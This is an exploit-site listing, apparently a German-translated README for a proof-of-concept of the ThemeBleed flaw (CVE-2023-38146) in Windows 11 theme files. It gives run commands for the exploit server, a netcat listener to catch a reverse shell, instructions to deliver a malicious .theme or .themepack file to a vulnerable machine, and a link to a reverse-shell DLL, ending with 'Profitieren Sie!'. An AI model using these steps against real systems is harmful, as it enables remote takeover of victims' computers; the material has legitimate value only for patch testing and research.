Sploitus

Exploit for CVE-2023-38146-Poc

kitploit · 2026-08-26

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CH0ICO-CVE-2023-38146-POC
# PoC für den ThemeBleed CVE-2023-38146-Exploit (Windows 11-Designs)

Stark inspiriert von https://github.com/gabe-k/themebleed, das nur unter Windows läuft (der Grund, warum ich mich entschieden habe, dies zu schreiben).

Verwendeter modifizierter Code aus der impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

Nützliche Sachen: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

Blog-Beitrag: https://jnns.de/posts/cve-2023-38146-poc/

## Wie man dies verwendet:

Installieren Sie die Abhängigkeiten und führen Sie die Anwendung aus:

root@kitploit:~
    
    
    pip3 install -r requirements.txt
    python3 themebleed.py -r HOST -p 4711
    
    # start nc listener in other shell
    rlwrap -cAr nc -lvnp 4711
    

Verwenden Sie "evil_theme.theme" oder "evil_theme.themepack" auf einem verwundbaren Rechner.

Profitieren Sie!

## Benutzerdefinierte DLL-Datei:

Platzieren Sie eine DLL mit einer exportierten Funktion "VerifyThemeVersion" im "./td/"-Ordner mit dem Namen "Aero.msstyles_vrf_evil.dll". Sie sollten ein Beispiel-DLL mit Google finden können oder verwenden Sie mein Beispiel https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.